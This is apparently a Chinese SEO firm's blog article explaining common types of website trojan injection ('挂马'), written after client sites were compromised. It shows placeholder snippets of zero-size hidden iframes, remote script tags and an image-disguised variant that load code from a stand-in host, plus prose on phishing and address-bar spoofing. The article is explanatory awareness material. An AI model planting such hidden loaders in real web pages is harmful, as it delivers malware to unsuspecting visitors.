珍岛SEO研究：网站挂马代码类型

前段时间公司优化项目中出现了几个网站被挂马的情况，所以SEO研究院就针对于挂马进行了研究，网站挂马常见的几种代码类型如下：

1、框架嵌入式网页挂马

框架嵌入式网页挂马是最早也是早有效的一种网络挂马技术，它是挂马者利用iframe语句，加载到任意网页中都可执行的挂马形式。通常的代码形式如下：

<iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe>

在打开插入该句代码的网页后，同时也就打开了http://www.xxx.com/muma.html这个页面，但是由于这个页面的长和宽都是“0”，所以很难被察觉到，极其隐蔽。

2、JS调用型网页挂马

JS调用型网页挂马是利用JS脚本文件调用的原理进行的网页木马隐蔽挂马技术，例如黑客制作了一个.JS的文件，然后就利用这个JS代码调用挂马的网页。通常的代码形式如下：

<script language=javascript src=http://www.xxx.com/gm.js></script>

http://www.xxx.com/gm.js这就是JS的脚本文件，通过它可以调用和执行木马的服务端。这些JS文件一般都是可以通过工具生成的，黑客只需要输入相关的选项就可以了。

3、图片伪装挂马

黑客们为了逃避杀毒监视就生产了一种新的技术――图片木马，如下面的这段代码

<html>

<iframe src="http://www.xxx.com/test.htm" height=0 width=0></iframe>

<img src="http://www.xxx.com/test.jpg">

</html>

攻击者将http://www.xxx.com/test.htm中的木马代码植入到了test.jpg图片文件中，这些嵌入代码的图片也都可以使用工具生成，黑客们只需要输入相关的选项就可以了。

4、网络钓鱼挂马

网络钓鱼挂马又称伪装调用挂马，是互联网中最常见的一种欺骗手段。它是黑客利用人们的好奇心、贪心等心理制作的一个伪装链接或网页。它利用社会工程学的欺骗方法，引诱用户点击，当用户打开一个看似正常的页面时，网页代码随之运行。

这种方式的隐蔽性极高，它往往是欺骗用户输入某些个人隐私信息，窃取个人隐私。如下图就是一个网络钓鱼网站，表面看起来没有异常，但是你看域名就会发现问题了。

5、伪装挂马

这是一种高级的欺骗挂马，是黑客利用IE或者是Fixfox浏览器的设计缺陷制造的一种高级欺骗技术，当用户访问木马页面时地址栏的是www.sina.com等用户信任的地址，但是其实打开了被挂马的页面，从而实现欺骗。